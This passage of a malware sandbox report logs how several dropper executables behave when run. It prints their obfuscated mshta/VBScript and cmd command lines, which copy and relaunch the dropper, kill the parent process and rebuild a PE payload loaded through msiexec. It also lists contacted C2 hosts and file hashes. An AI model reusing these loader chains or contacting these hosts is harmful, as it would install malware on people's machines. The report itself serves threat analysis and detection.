PID 3052 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe
PID 3052 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe
PID 3052 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe
PID 3052 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed0901eb1dae126e32.exe

Network

Country Destination Domain Proto
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp
NL 194.104.136.5:46013 tcp

Files

memory/3052-0-0x0000000074CAE000-0x0000000074CAF000-memory.dmp

memory/3052-1-0x0000000000980000-0x00000000009EA000-memory.dmp

memory/3052-2-0x0000000074CA0000-0x000000007538E000-memory.dmp

memory/1736-3-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1736-15-0x0000000000400000-0x0000000000420000-memory.dmp

memory/3052-14-0x0000000074CA0000-0x000000007538E000-memory.dmp

memory/1736-9-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1736-7-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1736-6-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1736-5-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1736-4-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1736-11-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1736-16-0x0000000074CA0000-0x000000007538E000-memory.dmp

memory/1736-17-0x0000000074CA0000-0x000000007538E000-memory.dmp

memory/1736-18-0x0000000074CA0000-0x000000007538E000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-11 09:28

Reported

2024-11-11 09:31

Platform

win10v2004-20241007-en

Max time kernel

92s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2304 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe C:\Windows\SysWOW64\mshta.exe
PID 2304 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe C:\Windows\SysWOW64\mshta.exe
PID 2304 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe C:\Windows\SysWOW64\mshta.exe
PID 4228 wrote to memory of 948 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 4228 wrote to memory of 948 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 4228 wrote to memory of 948 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 948 wrote to memory of 3288 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE
PID 948 wrote to memory of 3288 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE
PID 948 wrote to memory of 3288 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE
PID 948 wrote to memory of 4460 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 948 wrote to memory of 4460 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 948 wrote to memory of 4460 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 3288 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE C:\Windows\SysWOW64\mshta.exe
PID 3288 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE C:\Windows\SysWOW64\mshta.exe
PID 3288 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE C:\Windows\SysWOW64\mshta.exe
PID 2728 wrote to memory of 3588 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2728 wrote to memory of 3588 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2728 wrote to memory of 3588 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 3288 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE C:\Windows\SysWOW64\mshta.exe
PID 3288 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE C:\Windows\SysWOW64\mshta.exe
PID 3288 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE C:\Windows\SysWOW64\mshta.exe
PID 5036 wrote to memory of 464 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 5036 wrote to memory of 464 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 5036 wrote to memory of 464 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 464 wrote to memory of 4832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 464 wrote to memory of 4832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 464 wrote to memory of 4832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 464 wrote to memory of 2176 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 464 wrote to memory of 2176 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 464 wrote to memory of 2176 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 464 wrote to memory of 5112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\msiexec.exe
PID 464 wrote to memory of 5112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\msiexec.exe
PID 464 wrote to memory of 5112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\msiexec.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbScript: cLOSE ( CREatEObJEcT ( "WSCRIpt.ShELL" ). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF """" == """" for %L IN (""C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF "" == "" for %L IN ("C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe" ) do taskkill -f -im "%~nxL"

C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE

XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF

C:\Windows\SysWOW64\taskkill.exe

taskkill -f -im "Wed094c47c32b.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbScript: cLOSE ( CREatEObJEcT ( "WSCRIpt.ShELL" ). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF ""/Pgxf5hQhM5tF "" == """" for %L IN (""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF "/Pgxf5hQhM5tF " == "" for %L IN ("C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE" ) do taskkill -f -im "%~nxL"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCriPt: closE ( CrEaTeoBJecT ( "WsCRiPT.ShEll" ). RuN ( "cmd /R EcHO | SEt /p = ""MZ"" > OsuKT1.9t & cOPY /B /y OsuKT1.9t + XRB2l6FD.IlF +9Odf.6 PEQqN6S.Ou & STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t ", 0 , True ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R EcHO | SEt /p = "MZ" > OsuKT1.9t & cOPY /B /y OsuKT1.9t + XRB2l6FD.IlF+9Odf.6 PEQqN6S.Ou & STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" EcHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>OsuKT1.9t"

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe -y .\PEQQN6S.OU

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 75.117.19.2.in-addr.arpa udp
US 72.84.118.132:8080 tcp
US 8.8.8.8:53 www.svanaturals.com udp
CA 23.227.38.74:443 www.svanaturals.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 74.38.227.23.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE

MD5 b5cfd3a9dc9e645e24c79991bca60460
SHA1 0d6bcdca2121d279bbe87c66cab515ac2478f555
SHA256 852bffb94dbd3ed18ac11311b701ee80400209a19b3660b544146b41fa3b9768
SHA512 55861773c758e5f3cc7440d012d820892f7b9155b542baeab940a8c80fd50ffd1001fca6f9f9dae7eca3ae53919eba795aca53d5bb3aaaf29a111acd016d24e6

C:\Users\Admin\AppData\Local\Temp\OsuKT1.9t

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

C:\Users\Admin\AppData\Local\Temp\xrB2l6FD.ilF

MD5 cd4352def1a81b4fe232eeb2c77dbc57
SHA1 9fb4f9a790efe3676915699bdc89ba0a06ce8210
SHA256 93589b9795d7547015734043f51c8d9a561857452eb91a52609a0be35bc3701c
SHA512 1b59d106cc324ad4c6f99358f6d9a6ec9c671ec8573c1f3084bf3d7f3c8f410691c9324b986d51cd89d5b0c48be95298a13a012ecbcfa379af906db25066656e

C:\Users\Admin\AppData\Local\Temp\9Odf.6

MD5 b259839b9455f04e8299f22cebe3274f
SHA1 30bbbc8d5089648c8c5425c23874976ba2e07b34
SHA256 edf7907b29f08e5788b6c611660348cce7cfaacb16bc484471aa06a1b9f8af89
SHA512 3de7e0e2d59a9bda837ca9bc5f0da15106ed045aaf28b0ad9ff6afb2a901f23747ace1373d9538692847f51cfbb22fa608e526cacce737c7e70b7482a643bb0d

C:\Users\Admin\AppData\Local\Temp\PEQQN6S.OU

MD5 a2feb31d070b6920981b5461baa1ef81
SHA1 8b67bdb5e4a9e773c0ffade6545a3f292b2e7fd7
SHA256 ac7f2aaad9b9548136d48eb1e769d4339e958fb56fda2151f8637add5a77c950
SHA512 b82a3d898d1f328353c1911eff024f5b523f1d4fdf4dbdc914b2775d16590cce9c027e34b9c3f9681e9e09436dc345b4cff878b953c8525891736aeea1e14694

memory/5112-16-0x00000000022F0000-0x0000000002488000-memory.dmp

memory/5112-17-0x0000000002A60000-0x0000000002B0F000-memory.dmp

memory/5112-18-0x0000000002B10000-0x0000000002BAA000-memory.dmp

memory/5112-21-0x0000000002B10000-0x0000000002BAA000-memory.dmp

memory/5112-22-0x00000000022F0000-0x0000000002488000-memory.dmp

memory/5112-24-0x0000000002B10000-0x0000000002BAA000-memory.dmp

memory/5112-26-0x0000000004870000-0x0000000004904000-memory.dmp

memory/5112-25-0x0000000002BB0000-0x000000000486D000-memory.dmp

memory/5112-28-0x0000000004910000-0x000000000499F000-memory.dmp

memory/5112-27-0x0000000004910000-0x000000000499F000-memory.dmp

memory/5112-30-0x0000000004910000-0x000000000499F000-memory.dmp

memory/5112-31-0x0000000000150000-0x0000000000151000-memory.dmp

memory/5112-32-0x0000000000160000-0x0000000000164000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-11 09:28

Reported

2024-11-11 09:30

Platform

win7-20240903-en

Max time kernel

119s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09977fdc12334.exe"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09977fdc12334.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09977fdc12334.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09977fdc12334.exe"

Network

Country Destination Domain Proto
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-11-11 09:28

Reported

2024-11-11 09:31

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09abf83d9c2.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09abf83d9c2.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09abf83d9c2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09abf83d9c2.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09abf83d9c2.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09abf83d9c2.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09abf83d9c2.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09abf83d9c2.exe" -u

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 16.173.189.20.in-addr.arpa udp

Files

N/A